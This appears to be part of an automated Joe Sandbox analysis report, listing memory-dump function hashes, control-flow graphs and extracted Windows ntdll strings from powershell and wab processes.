                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2484103398.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ac0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $eq$$eq$$eq$$eq
                                                                              • API String ID: 0-812946093
                                                                              • Opcode ID: 4ae5dea302fa42050fca393a3154d3a727e3cd3244a6fee1f0326f659e68c671
                                                                              • Instruction ID: 79977e36d867b716dcc02b57416727e8c0f626c4f491844d95853e6787391d14
                                                                              • Opcode Fuzzy Hash: 4ae5dea302fa42050fca393a3154d3a727e3cd3244a6fee1f0326f659e68c671
                                                                              • Instruction Fuzzy Hash: F2312CB1B10202BFD62486755D01737779B8BC0759F24442DEA11CF3C6DD65DD9187E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2484103398.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ac0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 84wl$84wl$tPeq$tPeq
                                                                              • API String ID: 0-931831179
                                                                              • Opcode ID: 19f22baa3d594a47f6f32262bc93fdee2bb41ee3eeb65b1282906dd5a7dc6fe4
                                                                              • Instruction ID: 44e642b42a3b3dc12eb110b0b45b55ce113ddbf3dcbb24f7384745d5a514b1c1
                                                                              • Opcode Fuzzy Hash: 19f22baa3d594a47f6f32262bc93fdee2bb41ee3eeb65b1282906dd5a7dc6fe4
                                                                              • Instruction Fuzzy Hash: 3F318BB1A05314AFCB25CB689910A6ABFF1EF85310F04809EE855EF382CA319C41C7F2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2484103398.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ac0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $eq$$eq$$eq$$eq
                                                                              • API String ID: 0-812946093
                                                                              • Opcode ID: b99ac3e55159b5a3f6feec6d172ef68ad67f428ae1cbaaaf61eb21212e74ef1a
                                                                              • Instruction ID: 15e0ece2ad8aa15d5e272e980e286bb073b3fc4afdacc92e053d39d73404522f
                                                                              • Opcode Fuzzy Hash: b99ac3e55159b5a3f6feec6d172ef68ad67f428ae1cbaaaf61eb21212e74ef1a
                                                                              • Instruction Fuzzy Hash: 072147B2311306FBDB759A7E9C047237BE6ABC1710F24802EE915CB2C9DD75E8408361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2484103398.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ac0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'eq$4'eq$$eq$$eq
                                                                              • API String ID: 0-3287427201
                                                                              • Opcode ID: 2aac6debf40eed5277d75c3b8c698243c5a4d8a046d1b54cf0a24b9056dc7a7e
                                                                              • Instruction ID: be33f756071caad29042f951121f2730525d9771b1b6a47761e2c430a184ded1
                                                                              • Opcode Fuzzy Hash: 2aac6debf40eed5277d75c3b8c698243c5a4d8a046d1b54cf0a24b9056dc7a7e
                                                                              • Instruction Fuzzy Hash: 6A01A2A171E38A5FD73B86286C211A66F729FC355071A01DBC091DF397CA294D4687A3
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:0%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:40%
                                                                              Total number of Nodes:5
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph 68459 22742b60 LdrInitializeThunk 68462 22742c00 68464 22742c0a 68462->68464 68465 22742c11 68464->68465 68466 22742c1f LdrInitializeThunk 68464->68466

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 7 227435c0-227435cc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: de4df182a6b09f91525f80056af586770b1892a1584105ba7732052e40d08520
                                                                              • Instruction ID: b12bf6f9b1dd2ac0a668d891f4db347ea67a2aefd06839ebc352681d49e35a02
                                                                              • Opcode Fuzzy Hash: de4df182a6b09f91525f80056af586770b1892a1584105ba7732052e40d08520
                                                                              • Instruction Fuzzy Hash: 7B90023160960403D10071584554706500547D0201FA6C411B4424538D87958AA169A6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4 22742b60-22742b6c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: f758a41f3e3ab14bc48cf3b8bcafbe6f275e36fd8372cdbe6871fb2fe75bfc2d
                                                                              • Instruction ID: d5f920a663bc93ba971c7974e164cdc5daafa394cb9b78530752ead383236a51
                                                                              • Opcode Fuzzy Hash: f758a41f3e3ab14bc48cf3b8bcafbe6f275e36fd8372cdbe6871fb2fe75bfc2d
                                                                              • Instruction Fuzzy Hash: 4490026120650003410571584454616800A47E0201B96C021F5014560DC52589E16529
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5 22742c70-22742c7c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4bae76e86047351fed1fed8717adeab0bfd882493057693f8ec3db077528d3bc
                                                                              • Instruction ID: 7da664ccf74513aed263d2e0569febd62772128de3db8e76056c2fc39c1c0c43
                                                                              • Opcode Fuzzy Hash: 4bae76e86047351fed1fed8717adeab0bfd882493057693f8ec3db077528d3bc
                                                                              • Instruction Fuzzy Hash: DA90023120558803D1107158844474A400547D0301F9AC411B8424628D869589E17525
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 6 22742df0-22742dfc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 707a308f5f907531209e4bac9c2694a5e67843d8efff3b83fe7a795737480a91
                                                                              • Instruction ID: 7f1b24454f2a82f64df1aca87014fbd45afe735305f9a2a75455649736a556b2
                                                                              • Opcode Fuzzy Hash: 707a308f5f907531209e4bac9c2694a5e67843d8efff3b83fe7a795737480a91
                                                                              • Instruction Fuzzy Hash: 7390023120550413D11171584544707400947D0241FD6C412B4424528D96568AA2A525
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 22742c0a-22742c0f 1 22742c11-22742c18 0->1 2 22742c1f-22742c26 LdrInitializeThunk 0->2
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e976b0c9640a5869a61f1f19f66d5654f070c1e35381a1a4d2fdb9191eb62478
                                                                              • Instruction ID: 379e01874269ecc4f1751ccfcaeb9c57914b0bb2012c6d5d244bc137dc596338
                                                                              • Opcode Fuzzy Hash: e976b0c9640a5869a61f1f19f66d5654f070c1e35381a1a4d2fdb9191eb62478
                                                                              • Instruction Fuzzy Hash: 7BB09B71D066C5C6D701E7604B08717791067D0701F56C061F2030651F4778C2E1E575
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2160512332
                                                                              • Opcode ID: 0b8cfa172dd1e28bfffa6a981e0f5580799331b39689060d2f12fb6c0a7dbce2
                                                                              • Instruction ID: d63b3a0e684eddab5d94002841b087823ec70bfc7c31ebf705cf07ee6b4c8bff
                                                                              • Opcode Fuzzy Hash: 0b8cfa172dd1e28bfffa6a981e0f5580799331b39689060d2f12fb6c0a7dbce2
                                                                              • Instruction Fuzzy Hash: 7C929B71A0C781ABE721CF24C984F5AB7E8BB94755F00492DFA949B250E7B0EC44DB93
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 629 22738620-22738681 630 22775297-2277529d 629->630 631 22738687-22738698 629->631 630->631 632 227752a3-227752b0 GetPEB 630->632 632->631 633 227752b6-227752b9 632->633 634 227752d6-227752fc call 22742ce0 633->634 635 227752bb-227752c5 633->635 634->631 641 22775302-22775306 634->641 635->631 636 227752cb-227752d4 635->636 638 2277532d-22775341 call 227054a0 636->638 644 22775347-22775353 638->644 641->631 643 2277530c-22775321 call 22742ce0 641->643 643->631 649 22775327 643->649 646 2277555c-22775568 call 2277556d 644->646 647 22775359-2277536d 644->647 646->631 651 2277536f 647->651 652 2277538b-22775401 647->652 649->638 654 22775371-22775378 651->654 657 22775403-22775435 call 226ffd50 652->657 658 2277543a-2277543d 652->658 654->652 656 2277537a-2277537c 654->656 661 22775383-22775385 656->661 662 2277537e-22775381 656->662 668 2277554d-22775552 call 2278a4b0 657->668 659 22775514-22775517 658->659 660 22775443-22775494 658->660 665 22775555-22775557 659->665 666 22775519-22775548 call 226ffd50 659->666 669 22775496-227754cc call 226ffd50 660->669 670 227754ce-22775512 call 226ffd50 * 2 660->670 661->652 661->665 662->654 665->644 666->668 668->665 669->668 670->668
                                                                              Strings
                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2277540A, 22775496, 22775519
                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 227754E2
                                                                              • Thread identifier, xrefs: 2277553A
                                                                              • undeleted critical section in freed memory, xrefs: 2277542B
                                                                              • corrupted critical section, xrefs: 227754C2
                                                                              • Critical section address., xrefs: 22775502
                                                                              • 8, xrefs: 227752E3
                                                                              • Critical section debug info address, xrefs: 2277541F, 2277552E
                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 227754CE
                                                                              • Invalid debug info address of this critical section, xrefs: 227754B6
                                                                              • Address of the debug info found in the active list., xrefs: 227754AE, 227754FA
                                                                              • Critical section address, xrefs: 22775425, 227754BC, 22775534
                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 22775543
                                                                              • double initialized or corrupted critical section, xrefs: 22775508
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                              • API String ID: 0-2368682639
                                                                              • Opcode ID: 0617802ad604167f095ef92029c046479d784a186b072e70974347d6c2ac8a3b
                                                                              • Instruction ID: 2c3014877b6c2dc3b7a423e8eb203bd1b58dff8774fed40c56d665b4f4321456
                                                                              • Opcode Fuzzy Hash: 0617802ad604167f095ef92029c046479d784a186b072e70974347d6c2ac8a3b
                                                                              • Instruction Fuzzy Hash: 63817BB2A09358EFEF10CF94C984FAEBBB5EB08314F604119F909B7291D775A941CB60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/r"$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                              • API String ID: 0-2254657966
                                                                              • Opcode ID: a91417035b042cee89f462ef4bfcf41af21fb9caf20ccc7324718cf6400729a1
                                                                              • Instruction ID: 054233c446e6695c86e3fb6c3232385e6bc0f099b41c08656ef376f1048c3184
                                                                              • Opcode Fuzzy Hash: a91417035b042cee89f462ef4bfcf41af21fb9caf20ccc7324718cf6400729a1
                                                                              • Instruction Fuzzy Hash: A5B19B7290C3559FCB16CF24C580B5BBBE8AF98758F01492EF989D7240D734EA49CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                              • API String ID: 0-3591852110
                                                                              • Opcode ID: 90464702206d69ef67d63a0fdc6428cc26ea50fe03873757a89dff2ecc97048b
                                                                              • Instruction ID: 864e2e77ecdd2fc297eeb2280694b8a71654468bc2c321a73205fdb2d2816944
                                                                              • Opcode Fuzzy Hash: 90464702206d69ef67d63a0fdc6428cc26ea50fe03873757a89dff2ecc97048b
                                                                              • Instruction Fuzzy Hash: 3012D131608746DFDB15CF24C585BBABBF1FF09318F148559E8869BA62E734E980CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • @, xrefs: 226FD2AF
                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 226FD0CF
                                                                              • @, xrefs: 226FD313
                                                                              • H/r", xrefs: 2275A843
                                                                              • @, xrefs: 226FD0FD
                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 226FD196
                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 226FD262
                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 226FD146
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 226FD2C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/r"$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                              • API String ID: 0-469173503
                                                                              • Opcode ID: f112ba2828b5552c96991cbaffbf82e23c05c57d0dd1e92192565fcec3fac094
                                                                              • Instruction ID: f4a2e94dbb087475fb283ad315bdd15045fac450d0b316690299e31c4f0aa5a2
                                                                              • Opcode Fuzzy Hash: f112ba2828b5552c96991cbaffbf82e23c05c57d0dd1e92192565fcec3fac094
                                                                              • Instruction Fuzzy Hash: 2FA16E729083459FD711CF20C584B9BB7E8BF98759F00492EFA9997240E778E908CB93
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                              • API String ID: 0-3063724069
                                                                              • Opcode ID: 15aeec7fdfcfda5cf19b159ae2850322d907e2b2f8ea7edd6c3c7158c723d53d
                                                                              • Instruction ID: b3a14b11e61b6fb00dc5a9843792e94fe8a21f6702de3283fa4cff967b780261
                                                                              • Opcode Fuzzy Hash: 15aeec7fdfcfda5cf19b159ae2850322d907e2b2f8ea7edd6c3c7158c723d53d
                                                                              • Instruction Fuzzy Hash: 18D1D3B290D391EBE732CB50D845BABB7E8AF98754F400A29FA94A7150D770CA44C7D3
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                              • API String ID: 0-1700792311
                                                                              • Opcode ID: 6c3783478e399727564368b60e17df069fea3fc90640a94152ed7842ff783a5a
                                                                              • Instruction ID: 60e53c737e37f8adf6b9b9a6920b8ace59b6e5dc9e563b202b0b55ff37e922dc
                                                                              • Opcode Fuzzy Hash: 6c3783478e399727564368b60e17df069fea3fc90640a94152ed7842ff783a5a
                                                                              • Instruction Fuzzy Hash: 6AD1F032508786DFDB12CF68C590AADFBF1FF5A318F048059EA46AB652C738D985CB14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-523794902
                                                                              • Opcode ID: 922443f6a75a274720aaa63cd5e0d627187fc72f55c1aaacb9ae78f5b0a72390
                                                                              • Instruction ID: 61a5c265dd40de82dc1fcefdc1475dd2ebf01c7ca239b2bc30db59521699d1bd
                                                                              • Opcode Fuzzy Hash: 922443f6a75a274720aaa63cd5e0d627187fc72f55c1aaacb9ae78f5b0a72390
                                                                              • Instruction Fuzzy Hash: 6B42DD322087819FDB05CF28C584B1ABBE5FF88708F144A6DF996CB292DB34D945CB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H/r"$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                              • API String ID: 0-1097273638
                                                                              • Opcode ID: 8efc02bd378dba0c47a2db966614d7488e232a6a4c04e86d6746ace93ae6967a
                                                                              • Instruction ID: b58e49085bc5d88e6b57500cf116e702093b3a5d46b4f4c9805674024269466c
                                                                              • Opcode Fuzzy Hash: 8efc02bd378dba0c47a2db966614d7488e232a6a4c04e86d6746ace93ae6967a
                                                                              • Instruction Fuzzy Hash: AAF14C72D19719EBCB06CF94C994EAEBBB9EF58750F50015AE501FB210EB749E01CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2820756463.00000000226D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226D0000, based on PE: true
                                                                              • Associated: 00000008.00000002.2820756463.00000000227F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.00000000227FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000008.00000002.2820756463.000000002286E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_226d0000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                              • API String ID: 0-122214566
                                                                              • Opcode ID: c208f5455b881f329f40d8a7864b62e7d36822299ff048a6ace56cf83abd357f
                                                                              • Instruction ID: 96c534dac45213ee5301cba2e1c49b5e1b4d76244ad5c3b798c743d6523eaa8f
                                                                              • Opcode Fuzzy Hash: c208f5455b881f329f40d8a7864b62e7d36822299ff048a6ace56cf83abd357f
                                                                              • Instruction Fuzzy Hash: 74C18731A0C315ABDB158F68C881BBFBBB1EF58304F549169ED01AB681EB74CD48C792
